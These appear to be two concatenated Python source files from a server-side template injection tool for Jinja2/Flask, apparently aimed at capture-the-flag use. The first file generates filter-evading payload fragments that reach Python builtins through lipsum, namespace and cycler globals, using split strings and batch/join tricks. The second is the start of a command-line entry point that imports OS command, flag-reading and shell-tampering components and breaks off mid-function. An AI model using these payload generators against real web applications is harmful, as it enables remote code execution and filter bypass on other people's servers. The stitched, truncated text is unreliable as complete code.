import re

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument

from ..payload_gen import expression_gen
from ..rules_utils import (
    join_target,
    precedence,
    targets_from_pattern,
    literal_to_target,
)
from ..rules_types import *
from ..const import *
from ..wordlist import CHAR_PATTERNS

from ..context_vars import const_exprs, const_exprs_py3


# ---


@expression_gen
def gen_char_literal1(context, c):
    target_list = [(LITERAL, f"'{c}'" if c != "'" and c != "\\" else "'\\" + c + "'")]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_char_literal2(context, c):
    target_list = [(LITERAL, f'"{c}"' if c != '"' and c != "\\" else '"\\' + c + '"')]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_char_contextvars(context, c):
    alternatives = [
        [literal_to_target(expr)] for expr, (value, _) in const_exprs.items() if value == c
    ] + [
        [literal_to_target(expr), (REQUIRE_PYTHON3,)]
        for expr, (value, _) in const_exprs_py3.items()
        if value == c
    ]
    return [(ONEOF, alternatives)]


@expression_gen
def gen_char_selectpy3(context, c):
    matches = []
    for pattern, d in CHAR_PATTERNS.items():
        for index_str, value in d.items():
            if value == c:
                matches.append(
                    targets_from_pattern(pattern, {"INDEX": (INTEGER, int(index_str))})
                )
    if not matches:
        return [(UNSATISFIED,)]
    target_list = [(ONEOF, matches)]
    return [(REQUIRE_PYTHON3,), (EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_selectpy2(context, c):
    matches = []
    # in python2, reversed might not be an iterator
    for pattern, d in CHAR_PATTERNS.items():
        if "dict" in pattern or "reverse" in pattern:
            continue
        for index_str, value in d.items():
            if value == c:
                matches.append(
                    targets_from_pattern(pattern, {"INDEX": (INTEGER, int(index_str))})
                )
    if not matches:
        return [(UNSATISFIED,)]
    target_list = [(ONEOF, matches)]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_select(context, c):
    d = {
        2: "l",
        3: "t",
        4: ";",
        5: "g",
        6: "e",
        7: "n",
        8: "e",
        9: "r",
        10: "a",
        11: "t",
        12: "o",
        13: "r",
        14: " ",
        15: "o",
        16: "b",
        17: "j",
        18: "e",
        19: "c",
        20: "t",
        21: " ",
        22: "s",
        23: "y",
        24: "n",
        25: "c",
        26: "_",
        27: "d",
        28: "o",
        29: "_",
        30: "s",
        31: "l",
        32: "i",
        33: "c",
        34: "e",
        35: " ",
        36: "a",
        37: "t",
        38: " ",
        39: "0",
        40: "x",
    }

    if c not in d.values():
        return [(UNSATISFIED,)]
    matches = []
    for index, value in d.items():
        if value == c:
            matches.append(
                targets_from_pattern(
                    "x|slice(0)|e|list|batch(INDEX)|first|last",
                    {"0": (INTEGER, 0), "INDEX": (INTEGER, index)},
                )
            )
    target_list = [(ONEOF, matches)]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_flaskg(context, c):
    d = {
        1: "&",
        2: "l",
        3: "t",
        4: ";",
        5: "f",
        6: "l",
        7: "a",
        8: "s",
        9: "k",
        10: ".",
        11: "g",
        12: " ",
        13: "o",
        14: "f",
    }
    if c not in d.values():
        return [(UNSATISFIED,)]
    matches = []
    for index, value in d.items():
        if value == c:
            matches.append(
                targets_from_pattern(
                    "{G}|e|batch({INDEX})|first|last",
                    {"{G}": (FLASK_CONTEXT_VAR, "g"), "{INDEX}": (INTEGER, index)},
                )
            )
    target_list = [(ONEOF, matches)]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_dict(context, c):
    if not re.match("[A-Za-z]", c):
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, f"dict({c}=x)|join")]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_namespacedict(context, c):
    if not re.match("[A-Za-z]", c):
        return [(UNSATISFIED,)]
    target_list = [(LITERAL, f"namespace({c}=x)._Namespace__attrs|join")]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_num(context, c):
    if not re.match("[0-9]", c):
        return [(UNSATISFIED,)]
    target_list = targets_from_pattern(
        "INT.__str__( )",
        {
            "INT": (ENCLOSE_UNDER, precedence["attribute"], (INTEGER, int(c))),
            " ": (WHITESPACE,),
        },
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_char_num2(context, c):
    if not re.match("[0-9]", c):
        return [(UNSATISFIED,)]
    target_list = [
        (
            LITERAL,
            "(",
        ),
        (INTEGER, int(c)),
        (LITERAL, ")|string"),
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_lipsumdoc(context, c):
    lipsum_doc = """Generate some lorem ipsum for the template."""
    if c not in lipsum_doc:
        return [(UNSATISFIED,)]
    return [
        (
            EXPRESSION,
            precedence["item"],
            [
                (JINJA_CONTEXT_VAR, "lipsum"),
                (LITERAL, "["),
                (VARIABLE_OF, "__doc__"),
                (LITERAL, "]["),
                (INTEGER, lipsum_doc.index(c)),
                (LITERAL, "]"),
            ],
        )
    ]


@expression_gen
def gen_char_cyclerdoc(cotext, c):
    doc = """Cycle through values by yield them one at a time, then restarting
    once the end is reached. Available as ``cycler`` in templates.

    Similar to ``loop.cycle``, but can be used outside loops or across
    multiple loops. For example, render a list of folders and files in a
    list, alternating giving them "odd" and "even" classes.

    .. code-block:: html+jinja

        {% set row_class = cycler("odd", "even") %}
        <ul class="browser">
        {% for folder in folders %}
          <li class="folder {{ row_class.next() }}">{{ folder }}
        {% endfor %}
        {% for file in files %}
          <li class="file {{ row_class.next() }}">{{ file }}
        {% endfor %}
        </ul>

    :param items: Each positional argument will be yielded in the order
        given for each cycle.

    .. versionadded:: 2.1
    """
    alternatives = []
    for i, ch in enumerate(doc):
        if ch == c:
            alternatives += [
                [(LITERAL, f"cycler.__doc__[{i}]")],
                [(LITERAL, f"cycler.__doc__|batch({i+1})|first|last")],
            ]
        if len(alternatives) > 100:  # for perfomance
            break
    target_list = [(ONEOF, alternatives)]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_char_cycledoc2(context, c):
    doc = """Cycle through values by yield them one at a time, then restarting
    once the end is reached. Available as ``cycler`` in templates.

    Similar to ``loop.cycle``, but can be used outside loops or across
    multiple loops. For example, render a list of folders and files in a
    list, alternating giving them "odd" and "even" classes.

    .. code-block:: html+jinja

        {% set row_class = cycler("odd", "even") %}
        <ul class="browser">
        {% for folder in folders %}
          <li class="folder {{ row_class.next() }}">{{ folder }}
        {% endfor %}
        {% for file in files %}
          <li class="file {{ row_class.next() }}">{{ file }}
        {% endfor %}
        </ul>

    :param items: Each positional argument will be yielded in the order
        given for each cycle.

    .. versionadded:: 2.1
    """
    if c not in doc:
        return [(UNSATISFIED,)]
    return [
        (
            EXPRESSION,
            precedence["item"],
            [
                (JINJA_CONTEXT_VAR, "cycler"),
                (LITERAL, "["),
                (VARIABLE_OF, "__doc__"),
                (LITERAL, "]["),
                (INTEGER, doc.index(c)),
                (LITERAL, "]"),
            ],
        )
    ]


# ---


@expression_gen
def gen_string_lower_c_literal1(context):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, "'c'")])]


@expression_gen
def gen_string_lower_c_literal2(context):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, '"c"')])]


@expression_gen
def gen_string_lower_c_joindict(context):
    return [(EXPRESSION, precedence["plain_filter"], [(LITERAL, "dict(c=i)|join")])]


@expression_gen
def gen_string_lower_c_joinnamespacedict(context):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [(LITERAL, "namespace(c=x)._Namespace__attrs|join")],
        )
    ]


@expression_gen
def gen_string_lower_c_lipsumurlencode(context):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [(LITERAL, "lipsum|pprint|first|urlencode|last|lower")],
        )
    ]


@expression_gen
def gen_string_lower_c_lipsumbatch(context):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [
                (LITERAL, "lipsum|escape|batch("),
                (INTEGER, 8),
                (LITERAL, ")|first|last"),
            ],
        )
    ]


@expression_gen
def gen_string_lower_c_joinerbatch(context):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [
                (LITERAL, "joiner|string|batch("),
                (INTEGER, 2),
                (LITERAL, ")|first|last"),
            ],
        )
    ]


@expression_gen
def gen_string_lower_c_namespacebatch(context):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            [
                (LITERAL, "namespace|escape|batch("),
                (INTEGER, 36),
                (LITERAL, ")|first|last"),
            ],
        )
    ]


# range|trim|batch(2)|first|last


@expression_gen
def gen_string_lower_c_classbatch(context):
    class_alternatives: List[List[Target]] = [
        [(LITERAL, s)]
        for s in [
            "range",
            "cycler",
            "joiner",
            "namespace",
        ]
    ]
    tostring_alternatives: List[List[Target]] = [
        [(LITERAL, s)]
        for s in [
            "trim",
            "string",
        ]
    ]
    targets = targets_from_pattern(
        "{CLASS}|{TOSTRING}|batch({2})|first|last",
        {
            "{CLASS}": (ONEOF, class_alternatives),
            "{TOSTRING}": (ONEOF, tostring_alternatives),
            "{2}": (INTEGER, 2),
        },
    )
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_lower_c_classbatch2(context):
    class_alternatives: List[List[Target]] = [
        [(LITERAL, s)]
        for s in [
            "range",
            "cycler",
            "joiner",
            "namespace",
        ]
    ]
    targets = targets_from_pattern(
        "{CLASS}|e|batch({5})|first|last",
        {"{CLASS}": (ONEOF, class_alternatives), "{5}": (INTEGER, 5)},
    )
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_lower_c_char(context):
    return [(CHAR, "c")]


# ---


@expression_gen
def gen_string_percent_literal1(context):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, "'%'")])]


@expression_gen
def gen_string_percent_literal2(context):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, '"%"')])]


@expression_gen
def gen_string_percent_context(context):
    return [(VARIABLE_OF, "%")]


@expression_gen
def gen_string_percent_urlencode1(context):
    return [(EXPRESSION, precedence["plain_filter"], [(LITERAL, "lipsum()|urlencode|first")])]


@expression_gen
def gen_string_percent_urlencode2(context):
    return [
        (EXPRESSION, precedence["plain_filter"], [(LITERAL, "{}|escape|urlencode|first")])
    ]


@expression_gen
def gen_string_percent_lipsum1(context):
    target_list = targets_from_pattern(
        "lipsum[GLOBALS][BUILTINS][CHR](37)",
        {
            "GLOBALS": (
                ONEOF,
                [
                    [(LITERAL, "'__glob''al''s__'")],
                    [(VARIABLE_OF, "__globals__")],
                ],
            ),
            "BUILTINS": (
                ONEOF,
                [
                    [(LITERAL, "'__builti''ns__'")],
                    [(VARIABLE_OF, "__builtins__")],
                ],
            ),
            "CHR": (
                ONEOF,
                [
                    [(LITERAL, "'ch''r'")],
                    [(VARIABLE_OF, "chr")],
                ],
            ),
            "37": (INTEGER, 37),
        },
    )
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            target_list,
        )
    ]


@expression_gen
def gen_string_percent_lipsum2(context):
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            [(LITERAL, "lipsum.__globals__.__builtins__.chr(37)")],
        )
    ]


@expression_gen
def gen_string_percent_lipsum3(context):
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            [
                (LITERAL, "lipsum["),
                (VARIABLE_OF, "__globals__"),
                (LITERAL, "]["),
                (VARIABLE_OF, "__builtins__"),
                (LITERAL, "]["),
                (VARIABLE_OF, "chr"),
                (LITERAL, "]("),
                (WHITESPACE,),
                (INTEGER, 37),
                (WHITESPACE,),
                (LITERAL, ")"),
            ],
        )
    ]


@expression_gen
def gen_string_percent_lipsum4(context):
    # lipsum|attr("__getitem__")("__builtins__")|attr("__getitem__")("chr")(37)
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            [
                (LITERAL, "lipsum|attr("),
                (WHITESPACE,),
                (VARIABLE_OF, "__globals__"),
                (WHITESPACE,),
                (LITERAL, ")|attr("),
                (WHITESPACE,),
                (VARIABLE_OF, "__getitem__"),
                (WHITESPACE,),
                (LITERAL, ")("),
                (WHITESPACE,),
                (VARIABLE_OF, "__builtins__"),
                (WHITESPACE,),
                (LITERAL, ")|attr("),
                (WHITESPACE,),
                (VARIABLE_OF, "__getitem__"),
                (WHITESPACE,),
                (LITERAL, ")("),
                (WHITESPACE,),
                (VARIABLE_OF, "chr"),
                (WHITESPACE,),
                (LITERAL, ")("),
                (WHITESPACE,),
                (INTEGER, 37),
                (WHITESPACE,),
                (LITERAL, ")"),
            ],
        )
    ]


# ((12).__mod__.__doc__|batch(12)|first|last)


@expression_gen
def gen_string_percent_moddoc(context):
    target_list = [
        (
            ONEOF,
            [
                [(LITERAL, "(1).__mod__.__doc__")],
                [(LITERAL, "(( ).__len__( )).__mod__.__doc__")],
                [(LITERAL, "((\t).__len__(\t)).__mod__.__doc__")],
                [(LITERAL, "((\n).__len__(\n)).__mod__.__doc__")],
                [(LITERAL, "([ ].__len__( )).__mod__.__doc__")],
                [
                    (
                        LITERAL,
                        "((1)|attr(dict(__mod__=1)|first)|attr(dict(__doc__=1)|first))",
                    )
                ],
                [
                    (
                        LITERAL,
                        "((1)|attr(dict(__m=1,od__=1)|join)|attr(dict(__d=1,oc__=1)|join))",
                    )
                ],
            ],
        ),
        (
            ONEOF,
            [
                [(LITERAL, "["), (INTEGER, 11), (LITERAL, "]")],
                [
                    (LITERAL, ".__getitem__("),
                    (WHITESPACE,),
                    (INTEGER, 11),
                    (WHITESPACE,),
                    (LITERAL, ")"),
                ],
                [(LITERAL, "|batch(12)|first|last")],
            ],
        ),
    ]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_percent_namespace(context):
    target_list = targets_from_pattern(
        "namespace[INIT][GLOBALS][BUILTINS]['chr'](37)",
        {
            "INIT": (
                ONEOF,
                [
                    [(LITERAL, "'__ini''t__'")],
                    [(VARIABLE_OF, "__init__")],
                ],
            ),
            "GLOBALS": (
                ONEOF,
                [
                    [(LITERAL, "'__glob''al''s__'")],
                    [(VARIABLE_OF, "__globals__")],
                ],
            ),
            "BUILTINS": (
                ONEOF,
                [
                    [(LITERAL, "'__builti''ns__'")],
                    [(VARIABLE_OF, "__builtins__")],
                ],
            ),
            "CHR": (
                ONEOF,
                [
                    [(LITERAL, "'ch''r'")],
                    [(VARIABLE_OF, "chr")],
                ],
            ),
            "37": (INTEGER, 37),
        },
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_percent_dictbatch(context):
    whatever_onedigit_number = (ONEOF, [[(INTEGER, i)] for i in range(1, 10)])
    target_list = [
        (
            LITERAL,
            "((dict(dict(dict(a=",
        ),
        whatever_onedigit_number,
        (LITERAL, ")|tojson|batch("),
        (INTEGER, 2),
        (LITERAL, "))|batch("),
        (INTEGER, 2),
        (LITERAL, "))|join,"),
        (STRING_LOWERC,),
        (LITERAL, ",dict()|trim|last)|join).format("),
        (INTEGER, 37),
        (LITERAL, ")"),
    ]
    return [
        (EXPRESSION, precedence["function_call"], target_list),
        (REQUIRE_PYTHON3,),
    ]


@expression_gen
def gen_string_percent_lipsum(context):
    target_list = [
        (
            LITERAL,
            "lipsum[(lipsum|escape|batch(22)|list|first|last)*2"
            + "+dict(globals=i)|join+(lipsum|escape|batch(22)|list|first|last)*2]"
            + "[(lipsum|escape|batch(22)|list|first|last)*2+dict(builtins=i)"
            + "|join+(lipsum|escape|batch(22)|list|first|last)*2][dict(chr=i)|join](37)",
        )
    ]
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_percent_lipsumcomplex(context):
    target_list = [
        (LITERAL, "lipsum[(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "+dict(gl=x,obals=x)|join+(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "][(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "+dict(bui=x,ltins=x)|join+(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "][dict(c=x,hr=x)|join]("),
        (INTEGER, 37),
        (LITERAL, ")"),
    ]
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_percent_urlencodelong(context):
    target_list = [
        (
            ONEOF,
            [
                [(LITERAL, "(lipsum,)|map(")],
                [(LITERAL, "(cycler,)|map(")],
                [(LITERAL, "(joiner,)|map(")],
                [(LITERAL, "(namespace,)|map(")],
            ],
        ),
        (
            ONEOF,
            [
                [(LITERAL, "'ur''lencode'")],
                [(LITERAL, '"ur""lencode"')],
                [(LITERAL, "dict(urlencode=i)|first")],
                [(LITERAL, "dict(ur=x,lenc=x,ode=x)|join"), (REQUIRE_PYTHON3,)],
                [(LITERAL, "dict(ur=x,le=x,nco=x,de=x)|join"), (REQUIRE_PYTHON3,)],
                [(VARIABLE_OF, "urlencode")],
            ],
        ),
        (LITERAL, ")|first|first"),
    ]
    return [(EXPRESSION, precedence["enclose"], target_list)]


# (dict(((0,1),(0,1)))|replace(1|center|first,x)|replace(1,'c')).format(37)
@expression_gen
def gen_string_percent_replaceformat(context):
    target_list = [
        (
            LITERAL,
            "(dict(((0,1),(0,1)))|replace(1|center|first,x)|replace(1,",
        ),
        (STRING_LOWERC,),
        (LITERAL, ")).format("),
        (INTEGER, 37),
        (LITERAL, ")"),
    ]
    return [(EXPRESSION, precedence["function_call"], target_list)]


# (dict(((2,3),(2,3)))|replace(1|center|first,x)|replace(3,'c')).format(2,2,37)
@expression_gen
def gen_string_percent_replaceformat2(context):
    target_list = [
        (
            LITERAL,
            "(dict(((2,3),(2,3)))|replace(1|center|first,x)|replace(3,",
        ),
        (STRING_LOWERC,),
        (LITERAL, ")).format(2,2,"),
        (INTEGER, 37),
        (LITERAL, ")"),
    ]
    return [(EXPRESSION, precedence["function_call"], target_list)]


# ({1:1}|trim|replace(1,x|trim)|replace(x|center|first,"c")).format(37)


@expression_gen
def gen_string_percent_replaceformat3(context):
    target_list = [
        (
            ONEOF,
            [
                [
                    (
                        LITERAL,
                        "({NUM:NUM}|trim|replace(NUM,x|trim)|replace(x|center|first,".replace(
                            "NUM", str(i)
                        ),
                    )
                ]
                for i in range(0, 10)
            ],
        ),
        (STRING_LOWERC,),
        (LITERAL, ")).format("),
        (INTEGER, 37),
        (LITERAL, ")"),
    ]
    return [(EXPRESSION, precedence["function_call"], target_list), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_percent_char(context):
    return [(CHAR, "%")]


# ---


@expression_gen
def gen_string_percent_lower_c_literal1(context):
    target_list = [(LITERAL, "'%c'")]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_percent_lower_c_literal2(context):
    target_list = [(LITERAL, '"%c"')]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_percent_lower_c_literal3(context):
    target_list = [(LITERAL, '"%""c"')]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_percent_lower_c_literal5(context):
    target_list = [
        (
            ONEOF,
            [
                [(LITERAL, "'%'")],
                [(LITERAL, '"%"')],
            ],
        ),
        (
            ONEOF,
            [
                [(LITERAL, " ")],
                [(LITERAL, "\t")],
                [(LITERAL, "\n")],
                [(LITERAL, "\r")],
            ],
        ),
        (
            ONEOF,
            [
                [(LITERAL, "'c'")],
                [(LITERAL, '"c"')],
            ],
        ),
    ]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_percent_lower_c_context(context):
    return [(VARIABLE_OF, "%c")]

@expression_gen
def gen_string_percent_lower_c_concat(context):
    return [(STRING_CONCAT, (STRING_PERCENT,), (STRING_LOWERC,))]


@expression_gen
def gen_string_percent_lower_c_dictjoin(context):
    # "(dict([('%',x),('c',x)])|join)"
    pattern = "dict([(PERCENT,x),(LOWERC,x)])|join"
    targets = targets_from_pattern(
        pattern, {"PERCENT": (STRING_PERCENT,), "LOWERC": (STRING_LOWERC,)}
    )
    return [(EXPRESSION, precedence["plain_filter"], targets), (REQUIRE_PYTHON3,)]


@expression_gen
def gen_string_percent_lower_c_listjoin(context):
    # "(['%','c']|join)"
    pattern = "[PERCENT,LOWERC]|join"
    targets = targets_from_pattern(
        pattern, {"PERCENT": (STRING_PERCENT,), "LOWERC": (STRING_LOWERC,)}
    )
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_percent_lower_c_tuplejoin(context):
    # "(('%','c')|join)"
    pattern = "(PERCENT,LOWERC)|join"
    targets = targets_from_pattern(
        pattern, {"PERCENT": (STRING_PERCENT,), "LOWERC": (STRING_LOWERC,)}
    )
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_percent_lower_c_replaceconcat(context):
    # ('c'|replace(x|trim,'%',1))
    pattern = "LOWERC|replace(x|trim,PERCENT,ONE)"
    targets = targets_from_pattern(
        pattern,
        {"LOWERC": (STRING_LOWERC,), "PERCENT": (STRING_PERCENT,), "ONE": (INTEGER, 1)},
    )
    return [(EXPRESSION, precedence["called_filter"], targets)]


@expression_gen
def gen_string_percent_lower_c_cycler(context):
    pattern = (
        "cycler|pprint|list|pprint|urlencode|batch(TEN)"
        + "|first|join|batch(EIGHT)|list|last|reverse|join|lower"
    )
    targets = targets_from_pattern(
        pattern, {"TEN": (INTEGER, 10), "EIGHT": (INTEGER, 8)}
    )
    return [(EXPRESSION, precedence["plain_filter"], targets)]


# ---


@expression_gen
def gen_string_many_percent_lower_c_asis(context, count: int):
    if count != 1:
        return [(UNSATISFIED,)]
    return [(STRING_PERCENT_LOWER_C,)]


@expression_gen
def gen_string_many_percent_lower_c_multiply(context, count: int):
    return [(MULTIPLY, (STRING_PERCENT_LOWER_C,), (INTEGER, count))]


@expression_gen
def gen_string_many_percent_lower_c_literal1(context, count: int):
    return [
        (
            EXPRESSION,
            precedence["literal"],
            [(LITERAL, "'"), (LITERAL, "%c" * count), (LITERAL, "'")],
        )
    ]


@expression_gen
def gen_string_many_percent_lower_c_literal2(context, count: int):
    return [
        (
            EXPRESSION,
            precedence["literal"],
            [(LITERAL, '"'), (LITERAL, "%c" * count), (LITERAL, '"')],
        )
    ]


@expression_gen
def gen_string_many_percent_lower_c_replacespace(context, count: int):
    # (x|center(2)|replace(x|center|first,'%c'))
    target_list = targets_from_pattern(
        "x|center( COUNT )|replace(x|center|first,'%c' )",
        {
            "COUNT": (INTEGER, count),
            "'%c'": (STRING_PERCENT_LOWER_C,),
            " ": (WHITESPACE,),
        },
    )

    return [(EXPRESSION, precedence["called_filter"], target_list)]


@expression_gen
def gen_string_many_percent_lower_c_nulljoin(context, count: int):
    # ((x,x,x)|join('%c'))
    if count == 1:
        return [(STRING_PERCENT_LOWER_C,)]
    target_list = targets_from_pattern(
        "( ( {TUPLE}{,} )|join( {PERCENT_LOWER_C} ) )",
        {
            "{TUPLE}": join_target(
                (LITERAL, ","), [(LITERAL, "x") for _ in range(count + 1)]
            ),
            "{PERCENT_LOWER_C}": (STRING_PERCENT_LOWER_C,),
            "{,}": (ONEOF, [[(LITERAL, "")], [(LITERAL, "")]]),
            " ": (WHITESPACE,),
        },
    )
    return [(EXPRESSION, precedence["called_filter"], target_list)]


@expression_gen
def gen_string_many_percent_lower_c_concat(context, count: int):
    return [(STRING_CONCATMANY, [(STRING_PERCENT_LOWER_C,) for _ in range(count)])]


@expression_gen
def gen_string_many_percent_lower_c_join(context, count: int):
    if count == 1:
        return [(STRING_PERCENT_LOWER_C,)]
    target_list = targets_from_pattern(
        "( PARTS )|join",
        {
            "PARTS": join_target(
                (LITERAL, ","),
                targets=[(STRING_PERCENT_LOWER_C,) for _ in range(count)],
            ),
            " ": (WHITESPACE,),
        },
    )
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


# ---


@expression_gen
def gen_string_underline_literal1(context):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, "'_'")])]


@expression_gen
def gen_string_underline_literal2(context):
    return [(EXPRESSION, precedence["literal"], [(LITERAL, '"_"')])]


@expression_gen
def gen_string_underline_context(context: dict):
    return [(VARIABLE_OF, "_")]


@expression_gen
def gen_string_underline_format(context):
    targets = [
        (
            ONEOF,
            [
                [(LITERAL, '"%c"%')],
                [(LITERAL, '"%""c"%')],
                [(LITERAL, "'%c'%")],
                [(LITERAL, "'%''c'%")],
            ],
        ),
        (ENCLOSE_UNDER, precedence["mod"], (INTEGER, ord("_"))),
    ]
    return [(EXPRESSION, precedence["mod"], targets)]


@expression_gen
def gen_string_underline_lipsum(context):
    target_list = targets_from_pattern(
        "lipsum|escape|batch(22)|list|first|last", {"22": (INTEGER, 22)}
    )
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_underline_tupleselect(context):
    target_list = targets_from_pattern(
        "()|select|string|batch(25)|first|last", {"25": (INTEGER, 25)}
    )
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_underline_gget(context):
    target_list = targets_from_pattern(
        "{G}|attr({GET})|e|batch({18})|first|last",
        {
            "{G}": (FLASK_CONTEXT_VAR, "g"),
            "{GET}": (VARIABLE_OF, "get"),
            "{18}": (INTEGER, 18),
        },
    )
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_underline_char(context):
    return [(CHAR, "_")]


# ---


@expression_gen
def gen_string_twounderline_variable(context):
    return [(EXPRESSION, precedence["literal"], [(VARIABLE_OF, "__")])]

@expression_gen
def gen_string_twounderline_context(context):
    return [(VARIABLE_OF, "__")]

@expression_gen
def gen_string_twounderline_concat(context):
    return [(STRING_CONCAT, (STRING_UNDERLINE,), (STRING_UNDERLINE,))]


@expression_gen
def gen_string_twounderline_multiply(context):
    return [(MULTIPLY, (STRING_UNDERLINE,), (INTEGER, 2))]


@expression_gen
def gen_string_twounderline_format(context):
    targets = [
        (ENCLOSE_UNDER, precedence["mod"], (STRING, "%s%%s")),
        (LITERAL, "%"),
        (ENCLOSE_UNDER, precedence["mod"], (STRING_UNDERLINE,)),
        (LITERAL, "%"),
        (ENCLOSE_UNDER, precedence["mod"], (STRING_UNDERLINE,)),
    ]
    return [(EXPRESSION, precedence["mod"], targets)]


@expression_gen
def gen_string_twounderline_formatfilter(context):
    targets = [
        (ENCLOSE_UNDER, precedence["plain_filter"], (STRING, "%s%%s")),
        (LITERAL, "|format("),
        (WHITESPACE,),
        (STRING_UNDERLINE,),
        (WHITESPACE,),
        (LITERAL, ")"),
        (LITERAL, "|format("),
        (WHITESPACE,),
        (STRING_UNDERLINE,),
        (WHITESPACE,),
        (LITERAL, ")"),
    ]
    return [(EXPRESSION, precedence["called_filter"], targets)]


# ---


@expression_gen
def gen_string_many_format_c_simple(context, num):
    return [
        (
            MULTIPLY,
            (
                EXPRESSION,
                precedence["literal"],
                [(ONEOF, [[(LITERAL, "'{:c}'")], [(LITERAL, '"{:c}"')]])],
            ),
            (INTEGER, num),
        )
    ]


@expression_gen
def gen_string_many_format_c_complex(context, num):
    fomat_c_target_list = [
        (
            LITERAL,
            (
                "{1:2}|string|replace({1:2}|string|batch(4)|first|last,{}|join)"
                + "|replace(1|string,{}|join)|replace(2|string,"
            ),
        ),
        (STRING_LOWERC,),
        (WHITESPACE,),
        (LITERAL, ")"),
    ]
    return [
        (
            MULTIPLY,
            (EXPRESSION, precedence["called_filter"], fomat_c_target_list),
            (INTEGER, num),
        )
    ]



"""命令行界面的入口"""

import ast
import base64
import dataclasses
import json
import logging
import random
import string
import re
import time
from urllib.parse import urlparse
from typing import List, Dict, Tuple, Union, Any
from enum import Enum
from functools import partial
from pathlib import Path
from pprint import pformat


from rich.markup import escape as rich_escape
from rich.logging import RichHandler
import click

from .const import (
    DetectMode,
    TemplateEnvironment,
    PythonVersion,
    ReplacedKeywordStrategy,
    DetectWafKeywords,
    FindFlag,
    FLASK_CONTEXT_VAR,
    ATTRIBUTE,
    ITEM,
    OS_POPEN_READ,
    CONFIG,
    EVAL,
    STRING,
    DEFAULT_USER_AGENT,
    RENDER_ERROR_KEYWORDS,
    GETFLAG_CODE_EVAL,
)
from .cracker import (
    Cracker,
    EvalArgsModePayloadGen,
    guess_python_version,
    guess_is_flask,
)
from .form import Form, get_form
from .full_payload_gen import FullPayloadGen
from .requester import (
    HTTPRequester,
    TCPRequester,
    check_line_break,
    fix_line_break,
    check_tail,
    fix_tail,
)
from .submitter import (
    Submitter,
    PathSubmitter,
    FormSubmitter,
    TCPSubmitter,
    JsonSubmitter,
    shell_tamperer,
    ExtraParamAndDataCustomizable,
)
from .scan_url import yield_form
from .webui import main as webui_main
from .interact import interact
from .options import Options
from .pbar import pbar_manager, console

TITLE = r"""
    ____             _ _
   / __/__  ____    (_|_)___  ____ _
  / /_/ _ \/ __ \  / / / __ \/ __ `/
 / __/  __/ / / / / / / / / / /_/ /
/_/  \___/_/ /_/_/ /_/_/ /_/\__, /
              /___/        /____/

    ------Made with passion by Marven11
"""


LOGGING_FORMAT = "[bright_black bold]\\[%(levelname)s][/] | %(message)s"

logger = logging.getLogger("cli")


class EnumOption(click.Option):
    """Make click prints more readable prompt for Enum.
    Provide better hint when user input is wrong"""

    def type_cast_value(self, ctx: click.Context, value: Any):
        # Enum class is a callable, so click converts it to FuncParamType
        if not isinstance(self.type, click.types.FuncParamType):
            raise RuntimeError("This should be used on Enum!")
        clazz: type = self.type.func  # type: ignore
        if not issubclass(clazz, Enum):
            raise RuntimeError("This should be used on Enum!")
        try:
            _ = self.type(value)
        except Exception as exc:
